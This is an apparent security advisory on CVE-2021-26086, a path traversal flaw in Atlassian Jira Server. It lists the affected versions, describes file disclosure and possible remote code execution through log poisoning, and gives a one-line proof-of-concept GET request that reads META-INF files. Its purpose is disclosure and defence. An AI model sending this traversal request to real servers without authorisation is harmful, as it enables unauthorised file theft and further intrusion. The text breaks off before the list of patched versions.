Jira released an advisory about the newly identified path traversal and read file vulnerability, CVE-2021-26086, in the Jira Software Server.
Jira Software is a proprietary issue tracking product developed by Atlassian that allows bug tracking and agile project management.
This vulnerability is being actively exploited in the wild and has affected multiple versions of the software.
Atlassian has released a patch for CVE-2021-26086 in their latest versions of the Jira software including versions 8.5.14, 8.13.6, 8.16.1, and 8.17.0.
Threat actors could exploit this vulnerability to poison the server logs, thereby causing remote code execution and/ or exfiltration of sensitive files and information.
Jira Atlassian is one of the most popular ticketing tools used by organizations around the world. The vulnerability, CVE-2021-26086, is present in the following versions of Atlassian Jira Server and Data Center:
All versions below 8.5.14
All versions from 8.6.0 and before 8.13.6
All versions from 8.14.0 and before 8.16.1
This vulnerability allows a remote attacker to read all files via a path traversal vulnerability in the /WEB-INF/ and /META-INF/ directories.
The ease of exploitation of this flaw is alarming as a simple GET request to the above-mentioned endpoint would result in file inclusion.
Successful exploitation would result in full disclosure of sensitive logging files and configuration settings.
Proof of Concept (POC)
The Proof of Concept (POC) for this vulnerability involves sending a GET request to the /META-INF/ endpoint to retrieve sensitive information. The code used for this request is:
GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1
The execution of this code segment is shown in the image below along with the endpoint being used.
Impact & Mitigation
A remote attacker can read files and sensitive logging information which is available in META-INF or WEB-INF directory.
META-INF directory contains logging information and advanced configuration settings which can be read by the attacker.
A remote attacker can leverage that information to chain the attack and increase the attack surface.
This vulnerability can be leveraged to conduct an RCE (Remote code execution) attack by poisoning the logs on the server.
RCE allows attackers to take control of target systems and even execute ransomware on them.
Initial access to a corporate endpoint may potentially enable lateral movement across the internal network.
Nation-state actors leverage client-side zero-day vulnerabilities to compromise information, while ransomware groups use these vulnerabilities to extort money by encrypting user data.
Immediately update the Jira Software to any of the following patched versions: